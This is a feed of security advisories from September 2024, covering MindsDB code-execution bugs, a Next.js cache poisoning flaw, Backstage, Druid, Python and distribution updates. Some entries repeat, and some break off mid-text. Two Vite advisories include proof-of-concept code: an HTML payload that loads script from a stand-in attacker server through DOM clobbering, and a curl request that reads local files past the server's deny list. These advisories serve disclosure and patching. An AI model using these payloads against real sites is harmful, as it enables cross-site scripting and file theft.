16.09.2024 22:20:04	pypi	[PYSEC-2024-80] mindsdb vulnerability	An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the MindsDB platform, when the Microsoft SharePoint integration is installed on the server. For databases created with the SharePoint engine, an ‘INSERT’ query can be used for site column creation. If such a query is specially crafted to contain Python code and is run against the database, the code will be passed to an eval function and executed on the server.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-80
16.09.2024 22:20:05	pypi	[PYSEC-2024-81] mindsdb vulnerability	An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the MindsDB platform, when the Microsoft SharePoint integration is installed on the server. For databases created with the SharePoint engine, an ‘INSERT’ query can be used for list item creation. If such a query is specially crafted to contain Python code and is run against the database, the code will be passed to an eval function and executed on the server.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-81
16.09.2024 22:20:05	pypi	[PYSEC-2024-82] mindsdb vulnerability	Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded model to run arbitrary code on the server when interacted with.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-82
16.09.2024 22:20:05	pypi	[PYSEC-2024-83] mindsdb vulnerability	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when used for a prediction.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-83
17.09.2024 00:48:13	pypi	[PYSEC-2024-84] mindsdb vulnerability	Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when a ‘describe’ query is run on it.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-84
17.09.2024 00:48:13	pypi	[PYSEC-2024-85] mindsdb vulnerability	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when using ‘finetune’ on it.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-85
18.09.2024 04:54:49	fedora	[FEDORA-2024-9e85c72624] Fedora 41: chromium (high)	update to 128.0.6613.137 * High CVE-2024-8636: Heap buffer overflow in Skia * High CVE-2024-8637: Use after free in Media Router * High CVE-2024-8638: Type Confusion in V8 * High CVE-2024-8639: Use after free in Autofill	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9e85c72624
18.09.2024 01:29:01	maven	[MAVEN:GHSA-GC7Q-JGJV-VJR2] Keycloak Services has a potential bypass of brute force protection (moderate)	If an attacker launches many login attempts in parallel then the attacker can have more guesses at a password than the brute force protection configuration permits. This is due to the brute force check occurring before the brute force protector has locked the user.Acknowledgements:Special thanks to Maurizio Agazzini for reporting this issue and helping us improve our project.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GC7Q-JGJV-VJR2
18.09.2024 00:58:10	npm	[NPM:GHSA-GP8F-8M3G-QVJ9] Next.js Cache Poisoning (high)	### ImpactBy sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: - Next.js between 13.5.1 and 14.2.9- Using pages router- Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`The below configurations are unaffected:- Deployments using only app router- Deployments on [Vercel](https://vercel.com/) are not affected### PatchesThis vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not.### WorkaroundsThere are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.#### Credits- Allam Rachid (zhero_)- Henry Chen	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GP8F-8M3G-QVJ9
18.09.2024 00:31:29	npm	[NPM:GHSA-5J94-F3MF-8685] @backstage/plugin-techdocs-backend vulnerable to circumvention of cross site scripting protection (moderate)	### ImpactAn attacker with control of the contents of the TechDocs storage buckets is able to inject executable scripts in the TechDocs content that will be executed in the victim's browser when browsing documentation or navigating to an attacker provided link.### PatchesThis has been fixed in the 1.10.13 release of the `@backstage/plugin-techdocs-backend` package.### ReferencesIf you have any questions or comments about this advisory:Open an issue in the [Backstage repository](https://github.com/backstage/backstage)Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5J94-F3MF-8685
18.09.2024 01:25:21	maven	[MAVEN:GHSA-P72W-R6FV-6G5H] druid-pac4j, Apache Druid extension, has Padding Oracle vulnerability (low)	Padding Oracle vulnerability in Apache Druid extension, druid-pac4j.This could allow an attacker to manipulate a pac4j session cookie.This issue affects Apache Druid versions 0.18.0 through 30.0.0.Since the druid-pac4j extension is optional and disabled by default, Druid installations not using the druid-pac4j extension are not affected by this vulnerability.While we are not aware of a way to meaningfully exploit this flaw, we nevertheless recommend upgrading to version 30.0.1 or higher which fixes the issue and ensuring you have a strong druid.auth.pac4j.cookiePassphrase as a precaution.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P72W-R6FV-6G5H
18.09.2024 01:32:49	maven	[MAVEN:GHSA-JH66-3545-VPM7] Apache Druid: Users can provide MySQL JDBC properties not on allow list (low)	Apache Druid allows users with certain permissions to read data from other database systems using JDBC. This functionality allows trusted users to set up Druid lookups or run ingestion tasks. Druid also allows administrators to configure a list of allowed properties that users are able to provide for their JDBC connections. By default, this allowed properties list restricts users to TLS-related properties only. However, when configuration a MySQL JDBC connection, users can use a particularly-crafted JDBC connection string to provide properties that are not on this allow list.Users without the permission to configure JDBC connections are not able to exploit this vulnerability.CVE-2021-26919 describes a similar vulnerability which was partially addressed in Apache Druid 0.20.2.This issue is fixed in Apache Druid 30.0.1.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JH66-3545-VPM7
18.09.2024 01:29:20	npm	[NPM:GHSA-39V3-F278-VJ3G] @backstage/plugin-techdocs-backend storage bucket Directory Traversal vulnerability (moderate)	### ImpactWhen using the AWS S3 or GCS storage provider for TechDocs it is possible to access content in the entire storage bucket. This can leak contents of the bucket that are not intended to be accessible, as well as bypass permission checks in Backstage.### PatchesThis has been fixed in the 1.10.13 release of the `@backstage/plugin-techdocs-backend` package.### ReferencesIf you have any questions or comments about this advisory:Open an issue in the [Backstage repository](https://github.com/backstage/backstage)Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-39V3-F278-VJ3G
18.09.2024 01:29:10	npm	[NPM:GHSA-3X3F-JCP3-G22J] @backstage/plugin-catalog-backend Prototype Pollution vulnerability (moderate)	### ImpactA malicious actor with authenticated access to a Backstage instance with the catalog backend plugin installed is able to interrupt the service using a specially crafted query to the catalog API.### PatchesThis has been fixed in the `1.26.0` release of the `@backstage/plugin-catalog-backend` package.### ReferencesIf you have any questions or comments about this advisory:Open an issue in the [Backstage repository](https://github.com/backstage/backstage)Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3X3F-JCP3-G22J
17.09.2024 22:29:25	maven	[MAVEN:GHSA-2GH6-WC3M-G37F] hermes-management is vulnerable to RCE due to Apache commons-jxpath (critical)	### Impacthermes-management is vulnerable to RCE when it processes user-controlled data due to using Apache commons-jxpath.### PatchesUpgrade Hermes to at least hermes-2.2.9### Referenceshttps://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2GH6-WC3M-G37F
18.09.2024 01:28:58	npm	[NPM:GHSA-64VR-G452-QVP3] Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS (moderate)	### SummaryWe discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.Note that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986### DetailsBackgroundsDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:[1] https://scnps.co/papers/sp23_domclob.pdf[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/Gadgets found in ViteWe have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`.However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.```const relativeUrlMechanisms = { amd: (relativePath) => { if (relativePath[0] !== ".") relativePath = "./" + relativePath; return getResolveUrl( `require.toUrl('${escapeId(relativePath)}'), document.baseURI` ); }, cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath( relativePath )} : ${getRelativeUrlFromDocument(relativePath)})`, es: (relativePath) => getResolveUrl( `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url` ), iife: (relativePath) => getRelativeUrlFromDocument(relativePath), // NOTE: make sure rollup generate `module` params system: (relativePath) => getResolveUrl( `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url` ), umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath( relativePath )} : ${getRelativeUrlFromDocument(relativePath, true)})`};```### PoCConsidering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration. ```// main.jsimport extraURL from './extra.js?url'var s = document.createElement('script')s.src = extraURLdocument.head.append(s)``````// extra.jsexport default "https://myserver/justAnOther.js"``````// vite.config.jsimport { defineConfig } from 'vite'export default defineConfig({ build: { assetsInlineLimit: 0, // To avoid inline assets for PoC rollupOptions: { output: { format: "cjs" }, }, }, base: "./",});```After running the build command, the developer will get following bundle as the output.```// dist/index-DDmIg9VD.js"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src\|\|document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);```Adding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.```<!DOCTYPE html><html><head> <title>Vite Example</title> <!-- Attacker-controlled Script-less HTML Element starts--!> <img name="currentScript" src="https://attacker.controlled.server/"></img> <!-- Attacker-controlled Script-less HTML Element ends--!></head><script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script><body></body></html>```### ImpactThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.### Patch```// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296const getRelativeUrlFromDocument = (relativePath: string, umd = false) => getResolveUrl( `'${escapeId(partialEncodeURIPath(relativePath))}', ${ umd ? `typeof document === 'undefined' ? location.href : ` : '' }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src \|\| document.baseURI`, )```	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-64VR-G452-QVP3
18.09.2024 01:28:28	npm	[NPM:GHSA-9CWX-2883-4WFX] Vite's `server.fs.deny` is bypassed when using `?import&raw` (moderate)	### SummaryThe contents of arbitrary files can be returned to the browser.### Details`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.### PoC```sh$ npm create vite@latest$ cd vite-project/$ npm install$ npm run dev$ echo "top secret content" > /tmp/secret.txt# expected behaviour$ curl "http://localhost:5173/@fs/tmp/secret.txt" <body> <h1>403 Restricted</h1> <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.# security bypassed$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"export default "top secret content\n"//# sourceMappingURL=data:application/json;base64,eyJ2...```	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9CWX-2883-4WFX
17.09.2024 14:54:23	ubuntu	[USN-7001-2] xmltok library vulnerabilities (critical)	Several security issues were fixed in libxmltok.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7001-2
17.09.2024 11:41:17	ubuntu	[USN-7011-2] ClamAV vulnerabilities (high)	Several security issues were fixed in ClamAV.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7011-2
17.09.2024 08:18:27	ubuntu	[USN-7010-1] DCMTK vulnerabilities (high)	Several security issues were fixed in DCMTK.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7010-1
17.09.2024 05:59:08	fedora	[FEDORA-2024-e6b5e38ae6] Fedora 40: microcode_ctl (medium)	Update to upstream 2.1-45. 20240910Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode from revision 0x433 up to 0x434;Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode (in intel-ucode/06-9a-03) from revision 0x433 up to 0x434;Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode (in intel-ucode/06-9a-04) from revision 0x433 up to 0x434;Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode from revision 0x433 up to 0x434;Update of 06-aa-04/0xe6 (MTL-H/U C0) microcode from revision 0x1e up to 0x1f;Update of 06-b7-01/0x32 (RPL-S B0) microcode from revision 0x123 up to 0x129;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;Update of 06-ba-08/0xe0 microcode from revision 0x4121 up to 0x4122;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;Update of 06-bf-05/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;Update of 06-be-00/0x19 (ADL-N A0) microcode from revision 0x17 up to 0x1a (old pf 0x11).Addresses CVE-2024-23984, CVE-2024-24968Added the documentation directory to the list of files owned by the package	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e6b5e38ae6
17.09.2024 17:03:50	pypi	[PYSEC-2024-82] mindsdb vulnerability	Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded model to run arbitrary code on the server when interacted with.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-82
17.09.2024 17:03:50	pypi	[PYSEC-2024-83] mindsdb vulnerability	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when used for a prediction.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-83
17.09.2024 17:03:50	pypi	[PYSEC-2024-84] mindsdb vulnerability	Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when a ‘describe’ query is run on it.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-84
17.09.2024 17:03:51	pypi	[PYSEC-2024-85] mindsdb vulnerability	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when using ‘finetune’ on it.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-85
20.09.2024 04:57:05	fedora	[FEDORA-2024-1e6d6f8452] Fedora 40: python3.9 (critical)	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.This is a security release of Python 3.9Note: The release you're looking at is Python 3.9.20, a security bugfix releasefor the legacy 3.9 series. Python 3.12 is now the latest feature release seriesof Python 3. Get the latest release of 3.12.x here.Security content in this releasegh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fixCVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the newdirectory to the current user. This fixes CVE-2024-4030 affectingtempfile.mkdtemp() in scenarios where the base temporary directory is morepermissive than the default.gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see [`ver	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1e6d6f8452
20.09.2024 04:57:05	fedora	[FEDORA-2024-6dedbc5cf9] Fedora 40: python3.8 (critical)	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.This is a security release of Python 3.9Note: The release you're looking at is Python 3.9.20, a security bugfix releasefor the legacy 3.9 series. Python 3.12 is now the latest feature release seriesof Python 3. Get the latest release of 3.12.x here.Security content in this releasegh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fixCVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the newdirectory to the current user. This fixes CVE-2024-4030 affectingtempfile.mkdtemp() in scenarios where the base temporary directory is morepermissive than the default.gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see [`ver	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6dedbc5cf9
20.09.2024 03:44:07	fedora	[FEDORA-2024-f652468298] Fedora 39: python3.8 (critical)	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.This is a security release of Python 3.9Note: The release you're looking at is Python 3.9.20, a security bugfix releasefor the legacy 3.9 series. Python 3.12 is now the latest feature release seriesof Python 3. Get the latest release of 3.12.x here.Security content in this releasegh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fixCVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the newdirectory to the current user. This fixes CVE-2024-4030 affectingtempfile.mkdtemp() in scenarios where the base temporary directory is morepermissive than the default.gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: 